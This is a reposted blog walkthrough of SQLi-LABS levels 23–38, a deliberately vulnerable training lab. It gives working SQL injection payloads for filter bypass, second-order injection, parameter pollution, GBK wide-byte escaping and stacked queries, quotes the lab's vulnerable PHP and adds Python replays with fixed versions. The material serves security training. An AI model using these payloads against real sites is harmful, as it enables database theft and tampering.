SQLi-LABS Page-2 (Adv Injections)
2022-08-09 23:12:00 【[email protected]】
Contents
less-27: filters spaces, union, select, #, --, /*, +
less-28: filters spaces, /*, --, #, +, and the union select combination
less-29: error-based, GET, dual server, single-quote string injection
less-30: error-based, GET, dual server, double-quote string injection
less-31: error-based, GET, dual server, double quote + bracket injection
less-33: GET, addslashes(), single-quote closure
less-36: GET, mysql_real_escape_string(), single-quote closure
less-37: POST, mysql_real_escape_string(), single-quote closure
less-23: filters comments (# and --)
Close the single quote as usual, but because # and -- are stripped, a trailing comment can no longer swallow the rest of the query, and whatever is left after the injected columns breaks the syntax. Instead, end the payload with and ' so that the query's own closing quote is consumed:
payload: id=-1' union select 1,database(),3 and '
The statement that runs is ... WHERE id='-1' union select 1,database(),3 and '' LIMIT 0,1. The third column becomes 3 and '', which evaluates to 0; that is harmless, since database() is returned in column 2.
Key source:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
So # and -- are replaced with the empty string (which also kills the --+ form, whose + decodes to a space).
less-24: second-order injection
Register a user named admin'# and then go to Change Password:
The change is reported as successful, but it is admin's password that has been changed; log in as admin with the new password:
Key source:
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
With username=admin'# in the session the statement becomes:
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'
# and password='$curr_pass' ";
This changes admin's password. The quote in admin'# did no harm when the account was created, because it was stored as data; the password-change code then takes the name from $_SESSION, treats it as already-validated input (note that only the three POSTed fields go through mysql_real_escape_string) and concatenates it unescaped. That delayed reuse of stored data is what makes the injection second-order.
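The flow above, replayed as an added example that is not code from the lab or the post. sqlite3 stands in for MySQL, which forces two assumptions: sqlite escapes a quote by doubling it rather than with a backslash, and it has no # comment, so the malicious username is admin'-- instead of admin'#. The control flow is the lab's: registration stores the name safely, the password-change step trusts it later.

```python
import sqlite3

# Added example, not code from the lab or the post: the less-24 second-order
# flow replayed with sqlite3 standing in for MySQL. Assumptions of this
# stand-in: sqlite escapes a quote by doubling it, and it has no '#' comment,
# so the malicious username is "admin'-- " instead of the lab's "admin'#".

EVIL_NAME = "admin'-- "


def sql_escape(value: str) -> str:
    """Escape a value for use inside a single-quoted sqlite literal."""
    return value.replace("'", "''")


def fresh_db() -> sqlite3.Connection:
    # Constructed sample data: one admin account.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'admin')")
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # Registration is done correctly with bound parameters: the quote and the
    # comment marker are stored as plain characters, nothing is interpreted.
    con.execute("INSERT INTO users VALUES (?, ?, ?)", (2, username, password))
    con.commit()


def change_password_vulnerable(con, session_user: str, curr: str, new: str) -> str:
    # Same shape as the lab: the two POSTed fields are escaped, the username is
    # taken from the session as already-validated data and concatenated raw.
    sql = ("UPDATE users SET password='%s' WHERE username='%s' AND password='%s'"
           % (sql_escape(new), session_user, sql_escape(curr)))
    con.execute(sql)
    con.commit()
    return sql


def change_password_fixed(con, session_user: str, curr: str, new: str) -> int:
    # Every value, whether it came from the request or from storage, is bound.
    cur = con.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                      (new, session_user, curr))
    con.commit()
    return cur.rowcount


def password_of(con, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username=?",
                       (username,)).fetchone()[0]


def demo_vulnerable() -> tuple:
    """Returns (query that ran, admin's password, attacker's password)."""
    con = fresh_db()
    register(con, EVIL_NAME, "x")
    # The attacker, logged in as EVIL_NAME, 'changes their own password'.
    sql = change_password_vulnerable(con, EVIL_NAME, "x", "pwned")
    return sql, password_of(con, "admin"), password_of(con, EVIL_NAME)


def demo_fixed() -> tuple:
    """Returns (rows updated, admin's password, attacker's password)."""
    con = fresh_db()
    register(con, EVIL_NAME, "x")
    n = change_password_fixed(con, EVIL_NAME, "x", "pwned")
    return n, password_of(con, "admin"), password_of(con, EVIL_NAME)


if __name__ == "__main__":
    sql, admin_pw, evil_pw = demo_vulnerable()
    print(sql)
    print("vulnerable: admin=%s attacker=%s" % (admin_pw, evil_pw))
    print("fixed: rows=%d admin=%s attacker=%s" % demo_fixed())
```

In the vulnerable path the UPDATE that reaches the database ends at username='admin' and the rest is comment, so admin's password becomes pwned while the attacker's own stays x; with bound parameters only the attacker's row changes.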
less-25: filters and and or
Simply avoid and and or:
id=-1' union select 1,database(),3 %23
Key source:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
$id=$_GET['id'];
$id= blacklist($id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
The i flag makes the regex case-insensitive, so changing case does not help here. Each pattern is applied in a single pass, though, so double-writing works:
id=1' aandnd 1=1 --+
The operators && and || work as well (URL-encode them; a raw & would start a new query-string parameter):
id=1' %7c%7c 1=1 --+
id=1' %26%26 1=1 --+
The filter also mangles any other word containing or or and: information_schema becomes infmation_schema and password becomes passwd, so those need the same double-write (infoorrmation_schema, passwoorrd).
less-26: filters spaces, and, or, #, --, /*
Whitespace is stripped with \s, which in PCRE (without the /u flag) matches the ASCII whitespace bytes (%20, %09, %0a, %0c, %0d) but not the 0xa0 byte, so %a0 is what gets through here (%0a does not). All comment markers are stripped too, so close the quote instead: the leading quote of the final '3 pairs with the query's own trailing quote.
id=0'%a0union%a0select%a01,database(),'3
Key source:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
less-27: filters spaces, union, select, #, --, /*, +
Case variation gets through, and union can also be double-written:
id=0'%a0 uNion %a0 sElect %a01,database(),'3
id=0'%a0 uunionnion %a0 sElect %a0 1,database(),'3
id=0'%0a uNion %0a sElect %0a1,database(),'3
As in less-26 the trailing '3 closes the literal against the query's own quote; the plain spaces in these payloads are stripped and only the %a0/%0a bytes survive as separators.
Key source:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out select (lowercase only; m is not i).
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
Read the flag on each pattern: m and s are not i, so every match here is case-sensitive. select is stripped twice (by /select/m and again by /select/s), so a plain double-write such as sselectelect is reduced to select by the first pass and removed by the second; only a case variant (sElect) or a triple-write survives. union is stripped once per case variant, so both uNion and uunionnion get through.
Spaces can be bypassed with %a0 or %0a, because the space filter is the class [ +] and not \s.
less-28: filters spaces, /*, --, #, +, and the union select combination
%0a bypasses the space filter (the class is [ +], so a newline survives). The combined pattern /union\s+select/i is applied once, so uniunion%0aselecton%0aselect collapses to union%0aselect after the inner match is removed. Comments are stripped, so the trailing and(' closes the bracket and quote against the query's own ') instead; a %00 truncation variant (reported for PHP < 5.3.4) is also given:
id=0') %0a uniunion%0aselecton%0aselect %0a 1,database(),3 %0a and('
id=0') %0a uniunion%0aselecton%0aselect %0a 1,database(),3;%00
union %a0 select also defeats the combined filter, because \s does not match the 0xa0 byte:
id=0')%0a union %a0 select %0a 1,database(),3 %0a and('
id=0')%0a union %a0 select %0a 1,database(),3;%00
Key source:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
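To check the bypasses for less-23 and less-25 through less-28 without a lab instance, here is an added example (not code from the lab) that re-implements each blacklist() at the byte level. Python's re module on bytes behaves like PCRE without the /u flag: \s is ASCII whitespace only, so the 0x0a byte is stripped by \s while 0xa0 is not, which is exactly the difference the less-26 and less-28 payloads exploit. The query-string values are the page's own payloads, decoded the way $_GET decodes them.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not code from the lab: byte-level re-implementation of the
# blacklist() functions of less-23, 25, 26, 27 and 28. Patterns are applied
# with re on bytes, which like PCRE without /u treats \s as ASCII whitespace
# only (0x0a is whitespace, 0xa0 is not).


def strip(patterns, value: bytes, flags: int = 0) -> bytes:
    """One preg_replace($pattern, "", $value) per pattern, in order."""
    for p in patterns:
        value = re.sub(p, b"", value, flags=flags)
    return value


def less23(v: bytes) -> bytes:
    return strip([rb"#", rb"--"], v)


def less25(v: bytes) -> bytes:
    return strip([rb"or", rb"and"], v, re.I)            # /or/i then /AND/i


def less26(v: bytes) -> bytes:
    v = strip([rb"or", rb"and"], v, re.I)
    return strip([rb"[/*]", rb"-", rb"#", rb"\s", rb"[/\\]"], v)


def less27(v: bytes) -> bytes:
    v = strip([rb"[/*]", rb"-", rb"#", rb"[ +]", rb"select", rb"[ +]"], v)
    return strip([rb"union", rb"select", rb"UNION", rb"SELECT",
                  rb"Union", rb"Select"], v)              # all case-sensitive


def less28(v: bytes) -> bytes:
    v = strip([rb"[/*]", rb"-", rb"#", rb"[ +]", rb"[ +]"], v)
    return strip([rb"union\s+select"], v, re.I)


def get_param(raw: str) -> bytes:
    """Decode a query-string value the way $_GET does: '+' -> space, %xx -> byte."""
    return unquote_to_bytes(raw.replace("+", " "))


def filtered(level, raw: str) -> bytes:
    """The value after the level's blacklist(), i.e. what lands in $id."""
    return level(get_param(raw))


def final_sql(level, raw: str,
              template: bytes = b"SELECT * FROM users WHERE id='%s' LIMIT 0,1") -> bytes:
    """The statement the lab would send to MySQL for this level and value."""
    return template.replace(b"%s", filtered(level, raw))


if __name__ == "__main__":
    cases = [
        (less23, "-1' union select 1,database(),3--+"),        # comment stripped: broken
        (less23, "-1' union select 1,database(),3 and '"),     # closure instead: intact
        (less25, "1' aandnd 1=1 --+"),                         # double-write
        (less25, "information_schema"),                        # collateral damage
        (less26, "0'%0aunion%0aselect%0a1,database(),'3"),     # \s eats 0x0a
        (less26, "0'%a0union%a0select%a01,database(),'3"),     # 0xa0 survives
        (less27, "0'%a0 uunionnion %a0 sElect %a0 1,database(),'3"),
        (less27, "0'%a0uNion%a0sselectelect%a01,database(),'3"),  # select stripped twice
        (less28, "0') %0a uniunion%0aselecton%0aselect %0a 1,database(),3 %0a and('"),
    ]
    for level, raw in cases:
        print("%-7s %-62r -> %r" % (level.__name__, raw, filtered(level, raw)))
    print(final_sql(less28, cases[-1][1], b"SELECT * FROM users WHERE id=('%s') LIMIT 0,1"))
```

Run it and compare the output with the explanations above: the less-23 comment payload loses its -- and leaves a dangling quote, the less-27 sselectelect payload ends up with no select at all, and the less-28 double-write comes out as a clean union, newline, select.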
less-29: error-based, GET, dual server, single-quote string injection
The server side has two parts: a Tomcat (JSP) tier in front and an Apache (PHP) tier behind it, and it is the PHP tier that really serves the web application.
Apache/PHP resolves a repeated parameter to its last value, while Tomcat/JSP takes the first, and the WAF runs on the Tomcat side. So as long as the injection is placed in the second id parameter it gets past the WAF, which only ever inspects the first:
id=1&id=-1' union select 1,database(),3--+
The PHP side then uses the parameter with no filtering at all:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
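The parameter-pollution split described above, as an added example that is not code from the lab. The two parsing rules are the real ones (a servlet's getParameter() returns the first value of a repeated name, PHP's $_GET keeps the last); the WAF check is modelled as "id must be all digits", which is an assumption about the lab's front-end check rather than its code.

```python
import re
from urllib.parse import parse_qs

# Added example, not code from the lab: the less-29 query string as seen by
# the two parsers. The WAF rule ("id must be digits") is an assumption.

QUERY = "id=1&id=-1' union select 1,database(),3--+"   # constructed from the page's payload


def values(qs: str, name: str) -> list:
    return parse_qs(qs, keep_blank_values=True).get(name, [])


def waf_sees(qs: str) -> str:
    return values(qs, "id")[0]         # Tomcat/JSP: first occurrence wins


def php_sees(qs: str) -> str:
    return values(qs, "id")[-1]        # Apache/PHP: last occurrence wins


def waf_allows(value: str) -> bool:
    return re.fullmatch(r"\d+", value) is not None


def sql_reaching_mysql(qs: str):
    """What the PHP tier executes, or None if the WAF blocked the request."""
    if not waf_allows(waf_sees(qs)):
        return None
    return "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % php_sees(qs)


def sql_reaching_mysql_hardened(qs: str):
    """Same check, but a repeated parameter is rejected up front, so both
    tiers are guaranteed to be looking at the same single value."""
    ids = values(qs, "id")
    if len(ids) != 1 or not waf_allows(ids[0]):
        return None
    return "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % ids[0]


if __name__ == "__main__":
    print("WAF sees :", waf_sees(QUERY))
    print("PHP sees :", php_sees(QUERY))
    print("executed :", sql_reaching_mysql(QUERY))
    print("hardened :", sql_reaching_mysql_hardened(QUERY))
```

The WAF approves the 1, PHP executes the injected value; refusing duplicated parameters (or canonicalising them identically on both tiers) closes the gap.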
less-30: error-based, GET, dual server, double-quote string injection
id=1&id=-2" union select 1,database(),3--+
Same as less-29, only the closure is a double quote.
less-31: error-based, GET, dual server, double quote + bracket injection
id=1&id=-2") union select 1,database(),3--+
Same as less-30, only the closure becomes ").
less-32: wide-byte injection
The application backslash-escapes the special characters.
Wide-byte injection needs specific conditions, for example PHP handling the input as UTF-8 (in practice, as raw bytes) while the MySQL connection is set to gbk.
GBK encoding: one- and two-byte; 0x00-0x7F is single-byte and identical to ASCII. A double-byte character has a lead byte in 0x81-0xFE and a trail byte in 0x40-0x7E or 0x80-0xFE, a range that includes 0x5C, the backslash.
UTF-8 encoding: one to four bytes; 0x00-0x7F is single-byte and identical to ASCII, everything else is encoded with two to four bytes.
"Wide byte" here means a multi-byte encoding. The escaping works byte by byte and inserts 0x5C in front of the quote; when MySQL then decodes the string as GBK, a preceding byte such as %82 (or %df, %99) joins with that 0x5C to form one two-byte character, the backslash is consumed and the quote is live again.
Background on the principle: "Analysis and summary of the principle of wide byte injection", Tencent Cloud Developer Community (linked in the original).
id=-1%82' union select 1,database(),3 --+
Key source:
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
less-33: GET, addslashes(), single-quote closure
Key source:
function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
"addslashes() adds a backslash before predefined characters: single quote ('), double quote ("), backslash (\) and NUL."
The bypass is the same as in less-32, since addslashes() is also byte-oriented and knows nothing about the gbk connection:
id=-1%99' union select 1,database(),3--+
less-34: POST, addslashes()
Same as less-33, only submitted by POST:
uname=-1%99' union select 1,database()--+&passwd=1&submit=Submit
Submit it from Burp, not from HackBar.
less-35: GET, addslashes(), integer closure
Same as less-33, but the id is used as a bare integer, so there is no quote to escape and the escaping is irrelevant; inject directly:
id=-1 union select 1,database(),3 --+
Key source:
function check_addslashes($string)
{
$string = addslashes($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
print_r(mysql_error());
less-36: GET, mysql_real_escape_string(), single-quote closure
id=-1%99' union select 1,database(),3 --+
Key source:
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
mysql_real_escape_string() escapes the special characters in a string for use in an SQL statement. The affected characters are \x00, \n, \r, \, ', " and \x1a.
Unlike addslashes() it is meant to be character-set aware, but only when the client library knows the charset, that is when it was set with mysql_set_charset(). Here the charset is switched with a plain SET NAMES gbk query, which the client library never sees, so it still escapes byte by byte and the %99 trick works exactly as in less-33.
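The mechanism shared by less-32, less-33 and less-36, as an added example that is not code from the lab or the post: a byte-level replay showing what the byte-wise escaping produces, what a gbk connection makes of it, and what charset-aware escaping would have done instead. The charset-aware escaper and the literal walker are models of how the MySQL client library and lexer treat a gbk connection (a lead byte without a valid trail gets its own backslash; a backslash skips one byte; a valid lead+trail pair is one character), not their code, and the sample payloads are constructed from the page's.

```python
# Added example, not code from the lab: byte-level replay of the less-32/33/36
# wide-byte bypass. The charset-aware escaper and the literal walker below are
# models of libmysql / the MySQL lexer on a gbk connection, not their code.

GBK_LEAD = range(0x81, 0xFF)


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE


def addslashes(data: bytes) -> bytes:
    """PHP addslashes() on raw bytes: backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b == 0:
            out += b"\\0"
        else:
            if b in b"'\"\\":
                out += b"\\"
            out.append(b)
    return bytes(out)


def escape_gbk_aware(data: bytes) -> bytes:
    """Escaping when the client knows the connection is gbk: a complete
    lead+trail pair is copied untouched; a lead byte without a valid trail is
    itself escaped, so it can never pair with the 0x5C that escapes the quote."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in GBK_LEAD and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            out += data[i:i + 2]
            i += 2
            continue
        if b == 0:
            out += b"\\0"
        else:
            if b in GBK_LEAD or b in b"'\"\\":
                out += b"\\"
            out.append(b)
        i += 1
    return bytes(out)


def build_query(escaped_id: bytes) -> bytes:
    return b"SELECT * FROM users WHERE id='" + escaped_id + b"' LIMIT 0,1"


def live_sql(query: bytes) -> bytes:
    """Walk the id literal like a gbk-charset lexer: a backslash skips one
    byte, a valid lead+trail pair is one character, the first bare quote ends
    the literal. Returns everything after that quote, i.e. what is parsed as
    SQL instead of as string content."""
    i = query.index(b"id='") + 4
    while i < len(query):
        b = query[i]
        if b == 0x5C:
            i += 2
        elif b in GBK_LEAD and i + 1 < len(query) and is_gbk_trail(query[i + 1]):
            i += 2
        elif b == 0x27:
            return query[i + 1:]
        else:
            i += 1
    return b""


def payload(lead: int) -> bytes:
    # Constructed from the page's payloads: id=-1%df' / %82' / %99' ... --+
    return b"-1" + bytes([lead]) + b"' union select 1,database(),3 -- "


def compare(lead: int) -> tuple:
    """(live SQL after byte-wise escaping, live SQL after charset-aware escaping)."""
    return (live_sql(build_query(addslashes(payload(lead)))),
            live_sql(build_query(escape_gbk_aware(payload(lead)))))


def server_view(lead: int) -> str:
    """The byte-wise-escaped query decoded as GBK, the way the server reads it."""
    return build_query(addslashes(payload(lead))).decode("gbk", errors="replace")


if __name__ == "__main__":
    for lead in (0xDF, 0x82, 0x99):
        print(hex(lead), server_view(lead))      # 0xdf 0x5c decodes to one character
        unaware, aware = compare(lead)
        print("  byte-wise escape leaves live SQL:", unaware)
        print("  charset-aware escape leaves     :", aware)
```

With byte-wise escaping the literal ends at the injected quote and the whole union select becomes live SQL; with charset-aware escaping the lead byte is escaped on its own, the quote stays escaped, and only the lab's LIMIT 0,1 follows the literal. Bound parameters avoid the question entirely.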
less-37: POST, mysql_real_escape_string(), single-quote closure
Same as less-36, only submitted by POST:
uname=1%99' union select 1,database()--+&passwd=1&submit=Submit
less-38: stacked injection
A plain union query works directly:
id=-1' union select 1,database(),3--+
Key source:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql))
print_r(mysqli_error($con1));
mysqli_multi_query() executes one or more queries against the database, separated by semicolons, which is what makes stacking possible here.
Execute a second statement:
id=-1';insert into users(id,username,password)values(55,'123','312');--+
The page only renders the first result set, so nothing from the INSERT is displayed; the new row can be confirmed afterwards with an ordinary lookup of id=55.
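The difference the multi-query API makes, as an added example that is not code from the lab or the post. sqlite3 stands in for MySQL: its execute() accepts a single statement and raises if a second one follows, while executescript() runs every statement in the string, which mirrors mysqli_query() versus mysqli_multi_query(). sqlite reads -- as a line comment, so the page's payload (whose --+ arrives as "-- " after URL decoding) is used unchanged; the starting row is constructed sample data.

```python
import sqlite3

# Added example, not code from the lab: the less-38 stacked payload run
# through a single-statement API, a multi-statement API and a bound query,
# with sqlite3 standing in for MySQL.

PAYLOAD = "-1';insert into users(id,username,password)values(55,'123','312');-- "


def fresh_db() -> sqlite3.Connection:
    # Constructed sample data: one row, as the lab's users table might start.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    con.commit()
    return con


def query_for(id_value: str) -> str:
    return "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % id_value


def run_single(con: sqlite3.Connection, sql: str) -> str:
    """Single-statement API (like mysqli_query): the stacked INSERT is refused."""
    try:
        con.execute(sql)
        return "ok"
    except (sqlite3.ProgrammingError, sqlite3.Warning):   # message: one statement at a time
        return "refused"


def run_multi(con: sqlite3.Connection, sql: str) -> str:
    """Multi-statement API (like mysqli_multi_query): every statement runs."""
    con.executescript(sql)
    return "ok"


def run_bound(con: sqlite3.Connection, id_value: str) -> str:
    """The fix: the value is bound, so it can only ever be a value."""
    con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_value,))
    return "ok"


def row_count(con: sqlite3.Connection) -> int:
    return con.execute("SELECT count(*) FROM users").fetchone()[0]


def demo(mode: str) -> tuple:
    """Returns (status, rows in users afterwards) for 'single', 'multi' or 'bound'."""
    con = fresh_db()
    if mode == "single":
        status = run_single(con, query_for(PAYLOAD))
    elif mode == "multi":
        status = run_multi(con, query_for(PAYLOAD))
    else:
        status = run_bound(con, PAYLOAD)
    return status, row_count(con)


if __name__ == "__main__":
    for mode in ("single", "multi", "bound"):
        print("%-6s -> status=%s rows=%d" % ((mode,) + demo(mode)))
```

Only the multi-statement path leaves a second row behind; the single-statement API refuses the string outright, and the bound query treats the entire payload as a value that matches nothing.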
Copyright notice
This article was written by [[email protected]]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/221/202208091951459806.html